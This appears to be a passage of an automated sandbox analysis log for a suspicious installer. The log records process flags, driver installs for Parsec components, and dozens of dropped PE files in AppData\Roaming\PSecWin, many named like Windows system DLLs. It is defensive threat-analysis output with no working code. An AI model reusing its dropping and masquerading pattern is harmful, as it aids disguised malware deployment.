Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\grpconv.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\grpconv.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\grpconv.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\grpconv.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\drvinst.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 48_2_00007FF72C2F4DD0 SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,SetupDiBuildDriverInfoList,SetupDiEnumDriverInfoW,SetupDiEnumDeviceInfo,GetLastError,SetupDiDestroyDeviceInfoList,SetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,48_2_00007FF72C2F4DD0
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\SystemEventsBrokerClient.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-GF1GP.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-E9NUA.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-6QS3I.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\wiashext.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\rdvgocl32.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\RdpSaUacHelper.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\wlanext.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-LQSSJ.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-ETRQM.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-UEG3C.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-MAETF.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\TrustedSignalCredProv.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-4URGO.tmpJump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj59D8.tmp\nsExec.dllJump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsg84FF.tmp\System.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-RT5NS.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\kbdarmty.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\Windows.UI.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-9PV08.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\IEAdvpack.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-E0QD0.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\cryptdlg.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\networkhelper.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\MFWMAAEC.DLL (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\Windows.ApplicationModel.ConversationalAgent.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\WSClient.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\VscMgrPS.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-DPGTR.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\xpsservices.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-JR54E.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\kbd101b.DLL (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-9HF18.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Program Files\Parsec\uninstall.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\mfc140enu.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-CR69T.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-I559Q.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\UserDataAccessRes.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-MRTFO.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-O65TT.tmpJump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\SET7030.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\icuin.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\KBDA3.DLL (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\xwreg.dll (copy)Jump to dropped file
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{99c328e9-049a-fe42-a35c-67fa3e25e77d}\SET8ABC.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\VAN.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-PJ6TS.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\wups.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-2DG57.tmpJump to dropped file
Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{7106dfa1-62ec-4647-bfd5-42198dd8ac12}\SET70EC.tmpJump to dropped file
Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\parsecvusba.sys (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-B9257.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\LockAppBroker.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\MCRecvSrc.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\netevent.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\socialapis.dll (copy)Jump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\parsecvusba.sys (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\gp548-win64-mingw.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\dskquoui.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\netlogon.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-CEP95.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\TpmTool.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-2OR81.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Program Files\Parsec\skel\parsecd-150-93b.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-KU451.tmpJump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Program Files\Parsec Virtual USB Adapter Driver\uninstall.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-CFLCO.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\ApplicationID.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-JBM9N.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-GTN75.tmpJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Program Files\Parsec\teams.exeJump to dropped file
Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\SET638E.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\runonce.exe (copy)Jump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sysJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-BT11A.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\dmcfgutils.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-3KUTO.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-IQ3DU.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\ws2help.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\unins000.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\shrpubw.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\tapiui.dll (copy)Jump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj59D8.tmp\UserInfo.dllJump to dropped file
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{99c328e9-049a-fe42-a35c-67fa3e25e77d}\mm.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\mcbuilder.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-O9NMT.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\MP43DECD.DLL (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\sscore.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\verifier.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-HI204.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-ADU4M.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-0HD4S.tmpJump to dropped file
Source: C:\Windows\System32\drvinst.exeDropped PE file which has not been started: C:\Windows\System32\DriverStore\Temp\{7106dfa1-62ec-4647-bfd5-42198dd8ac12}\parsecvirtualds.sys (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-NSRV7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\getuname.dll (copy)Jump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDropped PE file which has not been started: C:\Program Files\Parsec Virtual Display Driver\uninstall.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-V0EDB.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-O1M5L.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-G3B26.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-S2KJ6.tmpJump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsg84FF.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-KU5LP.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\iesysprep.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-3JPOJ.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpDropped PE file which has not been started: C:\Users\user\AppData\Roaming\PSecWin\is-VK3B0.tmpJump to dropped file
